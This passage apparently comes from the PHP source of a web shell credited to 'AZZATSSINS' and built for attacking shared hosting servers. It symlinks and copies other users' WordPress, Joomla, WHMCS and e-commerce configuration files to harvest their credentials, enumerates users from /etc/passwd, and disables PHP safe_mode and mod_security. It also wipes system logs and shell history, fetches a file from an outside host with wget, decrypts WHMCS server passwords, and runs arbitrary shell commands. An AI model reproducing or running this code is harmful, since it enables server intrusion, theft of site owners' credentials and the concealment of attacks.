  387. symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  388. symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  389. symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  390. symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  391. symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  392. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  393. symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  394. symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  395. symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  396. symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  397. symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  398. symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  399. symlink('/home/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
  400. symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  401. symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.' <~ VBULLETIN.txt');
  402. symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.' <~ VBULLETIN.txt');
  403. symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  404. symlink('/home/'.$user.'/public_html/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  405. symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  406. symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  407. symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  408. symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  409. symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  410. symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  411. copy('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  412. copy('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  413. copy('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  414. copy('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  415. copy('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  416. copy('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  417. copy('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  418. copy('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  419. copy('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  420. copy('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  421. copy('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  422. copy('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  423. copy('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  424. copy('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  425. copy('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  426. copy('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  427. copy('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  428. copy('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  429. copy('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  430. copy('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  431. copy('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  432. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  433. copy('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  434. copy('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  435. copy('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  436. copy('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  437. copy('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  438. copy('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  439. copy('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  440. copy('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  441. copy('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  442. symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  443. symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  444. symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  445. symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  446. symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  447. symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  448. symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  449. symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  450. symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  451. symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  452. symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  453. symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  454. symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  455. symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  456. symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  457. symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  458. symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  459. /*You Can ReCoded But Don't Change ©CopyRight*/
  460. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  461. symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  462. symlink('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  463. symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  464. symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  465. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  466. symlink('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  467. symlink('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  468. symlink('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  469. symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  470. symlink('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  471. symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  472. symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  473. symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  474. symlink('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  475. symlink('/home/'.$user.'/public_html/bb-config.php',$user.' <~ BOXBILLING.txt');
  476. symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.' <~ BOXBILLING.txt');
  477. symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.' <~ BOXBILLING.txt');
  478. symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.' <~ BOXBILLING.txt');
  479. symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.' <~ BOXBILLING.txt');
  480. symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.' <~ BOXBILLING.txt');
  481. symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.' <~ BOXBILLING.txt');
  482. symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.' <~ BOXBILLING.txt');
  483. symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.' <~ BOXBILLING.txt');
  484. symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.' <~ BOXBILLING.txt');
  485. symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.' <~ BOXBILLING.txt');
  486. symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.' <~ BOXBILLING.txt');
  487. symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.' <~ BOXBILLING.txt');
  488. symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.' <~ BOXBILLING.txt');
  489. symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.' <~ BOXBILLING.txt');
  490. symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.' <~ BOXBILLING.txt');
  491. symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.' <~ BOXBILLING.txt');
  492. symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.' <~ BOXBILLING.txt');
  493. symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.' <~ BOXBILLING.txt');
  494. /*You Can ReCoded But Don't Change ©CopyRight*/
  495. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  496. symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  497. symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  498. symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  499. symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  500. symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  501. symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  502. symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  503. symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  504. symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  505. symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  506. symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  507. symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  508. symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  509. symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  510. symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  511. symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  512. symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  513. symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  514. symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  515. symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  516. symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  517. symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  518. symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  519. copy('/home/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  520. symlink('/home/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  521. copy('/home/'.$user.'/public_html/bw-configs/config.ini',$user.' <~ BOSWEB.txt');
  522. symlink('/home/'.$user.'/public_html/bw-configs/config.ini',$user.' <~ BOSWEB.txt');
  523. copy('/home/'.$user.'/public_html/config/koneksi.php',$user.' <~ LOKOMEDIA.txt');
  524.  
  525. symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.' <~ LOKOMEDIA.txt');
  526.  
  527. copy('/home/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  528. symlink('/home/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  529. copy('/home/'.$user.'/public_html/slconfig.php',$user.' <~ SITELOK.txt');
  530. symlink('/home/'.$user.'/public_html/slconfig.php',$user.' <~ SITELOK.txt');
  531.  
  532. }
  533. echo '<center> PROCESS DONE, You Can Go To The Fucking Folder <a href='.$folfig.'>'.$folfig.'</a> And View You The GodDamn Grab Configs...!!! <br> <marquee><font color=red><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>^_^ / Bye.....</a></font></marquee></center>';
  534. }
  535.  
  536. }
  537.  
  538. if($_POST['azzatssins2']){
  539. error_reporting(0);
  540. echo '<center><h2>Just View Directory Another User, Readable or Not</h2><br><hr><br>List of Readable<br><hr><br></center><table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  541. <td align="center"> <font color="violet"> <b>USERS PATH</b></td>
  542. <td align="center"> <font color="violet"> <b>DOMAINS</b></td>
  543.  
  544. ';
  545. //$us = file_get_contents("/etc/passwd");
  546. $usa = fopen('/etc/passwd','r');
  547. $dir = mkdir('jump', 0777);
  548. $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
  549. $frr = fopen('jump/.htaccess', 'w');
  550.  
  551. fwrite($frr, $rrrr);
  552. while($us = fgets($usa)){
  553. if($us==""){
  554.     echo "<font color=red><b>Can't read /etc/passwd</b></font><br><br>";
  555. }
  556. else{
  557. preg_match_all('/(.*?):x:/', $us, $user_byk);
  558.  
  559.     foreach($user_byk[1] as $user){
  560.         $dir1 = "/home/$user/public_html/";
  561.         if(is_readable($dir1)){
  562.            echo "<tr>
  563. <td><i><font color=green>$dir1</font></i></td>";
  564.  
  565.       $domainns = file_get_contents("/etc/named.conf");
  566.       if($domainns==""){
  567.         echo "<font color=red><b>Can't read /etc/named.conf</b></font><br><br>";
  568.       }
  569.       else{
  570.  
  571.       preg_match_all("#/var/named/(.*?).db#", $domainns, $domains);
  572.       foreach($domains[1] as $domain){
  573.        
  574.       $user2 = posix_getpwuid(@fileowner("/etc/valiases/$domain"));
  575.       $user2 = $user2['name'];
  576.       if ($user2=="$user"){
  577.         echo "<td><a class='azzatssins' href='http://".$domain." '><font color=lime>".$domain."</font></td>";
  578.         break;
  579.     }
  580.   }
  581.  
  582. }
  583.        }
  584.         else{
  585.            
  586.         }
  587.  
  588.    }
  589.  
  590. }
  591.  
  592. }
  593.  
  594. echo "</tr></table>";
  595.  
  596. }
  597. if($_POST['azzatssins3']){
  598.  
  599. @mkdir('azx',0777);
  600. $htcs = "Options Indexes FollowSymLinks \nDirectoryIndex azzatssins.htm \nAddType txt .php \nAddHandler txt .php";
  601. $f =@fopen ('azx/.htaccess','w');
  602. fwrite($f , $htcs);
  603. @symlink("/","azx/root");
  604.  
  605. $pg = basename(__FILE__);
  606. if(!is_file('named.txt')){
  607.  
  608. $d00m = @file("/etc/named.conf");
  609.  
  610. }else{
  611.  
  612. $d00m = @file("named.txt");
  613.  
  614. }
  615. if(!$d00m)
  616. {
  617.  
  618. die ("<center><font color=red><b>Can't Read /etc/passwd</b></font></center>");
  619. }
  620. else
  621.  
  622. {
  623. echo "<div class='azzatssins'><table align='center' width='40%'><td>DOMAINS</td><td>USERS</td><td>SYMLINK</td>";
  624. foreach($d00m as $dom){
  625.  
  626. if(eregi("zone",$dom)){
  627.  
  628. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  629.  
  630. flush();
  631.  
  632. if(strlen(trim($domsws[1][0])) > 2){
  633.  
  634. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  635.  
  636. flush();
  637.  
  638. $site = $user['name'] ;
  639.  
  640. @symlink("/","azx/root");
  641.  
  642. $site = $domsws[1][0];
  643.  
  644. $ir = 'ir';
  645.  
  646. $il = 'il';
  647.  
  648. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  649. {
  650. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  651. }
  652. echo "
  653. <tr>
  654. <td>
  655. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  656. </td>
  657. <td>
  658. ".$user['name']."
  659. </td>
  660. <td>
  661. <a href='azx/root/home/".$user['name']."/public_html' target='_blank'>Symlink </a>
  662. </td>
  663. </tr></div> ";
  664.  
  665. flush();
  666. flush();
  667.  
  668. }
  669. }
  670. }
  671. }
  672. }
  673. if($_POST['azzatssins4']){
  674. @session_start();
  675. @set_time_limit(0);
  676. @ini_set('max_execution_time',0);
  677. @mkdir('xazs',0777);
  678. $sempak  = "Options all \n
  679. DirectoryIndex azzatssins.html \n
  680. AddType text/plain .php \n
  681. AddHandler server-parsed .php \n  
  682. AddType text/plain .html \n
  683. AddHandler txt .html \n
  684. Require None \n
  685. Satisfy Any";
  686. $masuk =@fopen ('xazs/.htaccess','w');
  687. fwrite($masuk ,$sempak);
  688. @symlink('/','xazs/azzatssins.txt');  
  689. $pg = basename(__FILE__);
  690.  
  691.  
  692. if(is_readable("/var/named")){
  693. echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  694. <td align="center"> <font color="white"> <b>DOMAINS</b></td>
  695. <td align="center"> <font color="white"> <b>USERS</b></td>
  696. <td align="center"> <font color="white"> <b>SYMLINK</b></center></td>';
  697. $list = scandir("/var/named");
  698. foreach($list as $domain){
  699. if(strpos($domain,".db")){
  700. @error_reporting(0);
  701. @ini_set('log_errors',0);
  702. @ini_set('error_log',NULL);
  703.  
  704. $i += 1;
  705. $domain = str_replace('.db','',$domain);
  706. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  707. echo "<tr>
  708. <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
  709. <td align='center'><font color='white'>".$owner['name']."</td>
  710. <td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  711. }
  712. }
  713. flush();
  714. flush();
  715. }
  716. echo "</tr></table></div></html>";
  717.  
  718. }
  719. if($_POST['azzatssins5']){
  720. echo ini_get("safe_mode");
  721.  echo ini_get("open_basedir");
  722.  ini_restore("safe_mode");
  723.  ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
  724. fwrite($phi,"safe_mode = Off
  725. disable_functions = NONE
  726. safe_mode_gid = OFF
  727. open_basedir = OFF ");$phii = fopen(".htaccess","w+");
  728. fwrite($phii,"<IfModule mod_security.c>
  729. KillFilterEngine Off
  730. KillFilterScanPOST Off
  731. KillFilterCheckURLEncoding Off
  732. KillFilterCheckUnicodeEncoding Off
  733. </IfModule>
  734. "); }
  735. if($_POST['azzatssins7']){
  736.  
  737. if(is_readable("/etc/named.conf")){
  738.  
  739. echo '&raquo; /etc/named.conf is readable.<br />';
  740.  
  741. }else{
  742.  
  743. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  744.  
  745. }
  746.  
  747. if(is_readable("/etc/passwd")){
  748.  
  749. echo '&raquo; /etc/passwd is readable.<br />';
  750.  
  751. }else{
  752.  
  753. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  754.  
  755. }
  756.  
  757. if(is_readable("/etc/valiases")){
  758.  
  759. echo '&raquo; /etc/valiases exists';
  760.  
  761. if(is_array(scandir("/etc/valiases"))){
  762.  
  763. echo ' & scanable';
  764.  
  765. }
  766.  
  767. echo '.<br />';
  768.  
  769. }else{
  770.  
  771. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  772.  
  773. }
  774.  
  775. if(is_readable("/var/named")){
  776.  
  777. echo '&raquo; /var/named exists';
  778.  
  779. if(is_array(scandir("/var/named"))){
  780.  
  781. echo ' & scanable';
  782.  
  783. }
  784.  
  785. echo '.<br />';
  786.  
  787. }else{
  788.  
  789. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  790.  
  791. }
  792.  
  793. if(ini_get('disable_functions')){
  794.  
  795. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  796.  
  797. }
  798.  
  799. if(function_exists("symlink")){
  800.  
  801. echo '&raquo; Symlinking allowed<br />';
  802.  
  803. }else{
  804.  
  805. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  806.  
  807. }
  808.  
  809. if(is_writable("/var/tmp")){
  810.  
  811. echo '&raquo; /var/tmp folder is writable<br />';
  812.  
  813. }
  814.  
  815. if(is_readable('/var/log')){
  816.  
  817. echo '&raquo; /var/log folder is readable<br />';
  818.  
  819. }
  820.  
  821. die();
  822. }
  823. if($_POST['azzatssins8']){
  824. @error_reporting(0);
  825. system("rm -rf /tmp/logs");
  826. system("rm -rf /root/.bash_history");
  827. system("rm -rf /root/.ksh_history");
  828. system("rm -rf /root/.bash_logout");
  829. system("rm -rf /usr/local/apache/logs");
  830. system("rm -rf /usr/local/apache/log");
  831. system("rm -rf /var/apache/logs");
  832. system("rm -rf /var/apache/log");
  833. system("rm -rf /var/run/utmp");
  834. system("rm -rf /var/logs");
  835. system("rm -rf /var/log");
  836. system("rm -rf /var/adm");
  837. system("rm -rf /etc/wtmp");
  838. system("rm -rf /etc/utmp");
  839. system("rm -rf $HISTFILE");
  840. system("rm -rf /var/log/lastlog");
  841. system("rm -rf /var/log/wtmp");
  842. system("rm -rf cnf");system("rm -rf xazs"); system("rm -rf CONFIGRAB"); system("rm -rf azx"); system("rm -rf AZZATSSINS");system("rm -rf jump");unlink('mysql.php');unlink('wd.php'); unlink('wk.php');unlink('rw.php');
  843. system('wget -O error.php www.x-x-x.yn.lt/error.css');system('chmod 0400 error.php');
  844. $fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn);echo'<meta http-equiv="Refresh" content= "0; url=?">';
  845. }
  846. elseif(isset($_GET['whmcs']) && ($_GET['whmcs'] == 'decode'))
  847. {  
  848. ?>
  849. <form action="?whmcs=decode" method="post">
  850.  
  851. <?php
  852.  
  853. function decrypt ($string,$cc_encryption_hash)
  854. {
  855.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  856.     $hash_key = _hash ($key);
  857.     $hash_length = strlen ($hash_key);
  858.     $string = base64_decode ($string);
  859.     $tmp_iv = substr ($string, 0, $hash_length);
  860.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  861.     $iv = $out = '';
  862.     $c = 0;
  863.     while ($c < $hash_length)
  864.     {
  865.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  866.         ++$c;
  867.     }
  868.     $key = $iv;
  869.     $c = 0;
  870.     while ($c < strlen ($string))
  871.     {
  872.         if (($c != 0 AND $c % $hash_length == 0))
  873.         {
  874.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  875.         }
  876.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  877.         ++$c;
  878.     }
  879.     return $out;
  880. }
  881.  
  882. function _hash ($string)
  883. {
  884.     if (function_exists ('sha1'))
  885.     {
  886.         $hash = sha1 ($string);
  887.     }
  888.     else
  889.     {
  890.         $hash = md5 ($string);
  891.     }
  892.     $out = '';
  893.     $c = 0;
  894.     while ($c < strlen ($hash))
  895.     {
  896.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  897.         $c += 2;
  898.     }
  899.     return $out;
  900. }
  901.  
  902. echo "
  903. <br>
  904.  
  905. <FORM method='post'>
  906. <input type='hidden' name='form_action' value='2'>
  907. <br>
  908. <table class=tabnet style=width:320px;padding:0 1px;>
  909. <tr><th colspan=2>WHMCS Decoder</th></tr>
  910. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  911. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  912. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  913. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  914. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  915. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  916. </table>
  917. </FORM>
  918. </center>
  919. ";
  920.  
  921.  if($_POST['form_action'] == 2 )
  922.  {
  923.  //include($file);
  924.  $db_host=($_POST['db_host']);
  925.  $db_username=($_POST['db_username']);
  926.  $db_password=($_POST['db_password']);
  927.  $db_name=($_POST['db_name']);
  928.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  929.  
  930.  
  931.  
  932.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  933.         mysql_select_db($db_name,$link) ;
  934. $query = mysql_query("SELECT * FROM tblservers");
  935. while($v = mysql_fetch_array($query)) {
  936. $ipaddress = $v['ipaddress'];
  937. $username = $v['username'];
  938. $type = $v['type'];
  939. $active = $v['active'];
  940. $hostname = $v['hostname'];
  941. echo("<center><table border='1'>");
  942. $password = decrypt ($v['password'], $cc_encryption_hash);
  943. echo("<tr><td>Type</td><td>$type</td></tr>");
  944. echo("<tr><td>Active</td><td>$active</td></tr>");
  945. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  946. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  947. echo("<tr><td>Username</td><td>$username</td></tr>");
  948. echo("<tr><td>Password</td><td>$password</td></tr>");
  949.  
  950. echo "</table><br><br></center>";
  951. }
  952.  
  953.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  954.         mysql_select_db($db_name,$link) ;
  955. $query = mysql_query("SELECT * FROM tblregistrars");
  956. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  957. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  958. while($v = mysql_fetch_array($query)) {
  959. $registrar     = $v['registrar'];
  960. $setting = $v['setting'];
  961. $value = decrypt ($v['value'], $cc_encryption_hash);
  962. if ($value=="") {
  963. $value=0;
  964. }
  965. $password = decrypt ($v['password'], $cc_encryption_hash);
  966. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  967. }
  968. }
  969. }
  970.  
  971.  
  972.  
  973.  
  974. $currentCMD = str_replace("\\\"","\"",$currentCMD);
  975. $currentCMD = str_replace("\\\'","\'",$currentCMD);
  976.  
  977. if( $_POST['_act'] == "Upload!" ) {
  978.     if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
  979.         echo "<center><b>Error while uploading file!</b></center>";
  980.     } else {
  981.         echo "<center><pre>";
  982.         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
  983.         echo "</pre><b>File uploaded successfully!</b></center>";
  984.     }    
  985. } else {
  986.     echo "<b><br><font color='#006800'><pre><br>";
  987.     $currentCMD = "cd ".$currentWD.";".$currentCMD;
  988.     system($currentCMD);
  989.     echo "<br></pre></font><br></b>";
  990. }
  991.  
  992. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'JPASS')) {
  993. ?>
  994. <form action="?&amp;AZZATSSINS=JPASS" method="post">
  995. <?php
  996. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ JOOMLA</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
  997. if(empty($_POST['pwd'])){
  998. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  999. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
  1000. <tr><td>&nbsp;&nbsp;Database</td><td>
  1001. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr>
  1002. <tr><td>&nbsp;&nbsp;username</td><td>
  1003. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
  1004. <tr><td>&nbsp;&nbsp;password</td><td>
